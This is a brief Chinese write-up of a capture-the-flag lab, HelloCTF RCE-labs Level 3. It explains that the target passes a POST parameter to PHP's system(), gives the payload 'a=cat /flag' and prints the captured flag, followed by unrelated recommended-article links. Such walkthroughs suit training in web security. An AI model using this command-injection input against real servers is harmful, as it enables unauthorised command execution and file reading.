HelloCTF [RCE-labs] Level 3 - 命令执行

开启靶场,打开链接:

这关代码跟level 1的区别是eval(_POST\['a'\]);变成了system(_POST['a']);

system() 函数会通过软连接执行你输入的系统命令

POST传参:a=cat /flag

成功得到flag:

NSSCTF{b10b3661-b382-467e-86be-4c374fdd3e5f}

相关推荐
北岛寒沫3 小时前
北京大学国家发展研究院 经济学原理课程笔记(第二十一课 金融学基础)
经验分享·笔记·学习
扑火的小飞蛾3 小时前
网络安全小白学习路线图 (基于提供文档库)
学习·安全·web安全
计算机程序设计小李同学4 小时前
个人数据管理系统
java·vue.js·spring boot·后端·web安全
电商API&Tina6 小时前
京东 API 数据采集接口接入与行业分析
运维·服务器·网络·数据库·django·php
浩瀚地学7 小时前
【Java】常用API(二)
java·开发语言·经验分享·笔记·学习
Kratzdisteln7 小时前
【MVCD】PPT提纲汇总
经验分享·python
恩创软件开发8 小时前
创业日常2026-1-8
java·经验分享·微信小程序·小程序
上海云盾商务经理杨杨8 小时前
2026年等保测评终极指南:新规解读、策略选择与一站式服务深度剖析
网络安全
源代码•宸9 小时前
Leetcode—39. 组合总和【中等】
经验分享·算法·leetcode·golang·sort·slices
三流架构师9 小时前
高中英语资源合集(第二辑)
经验分享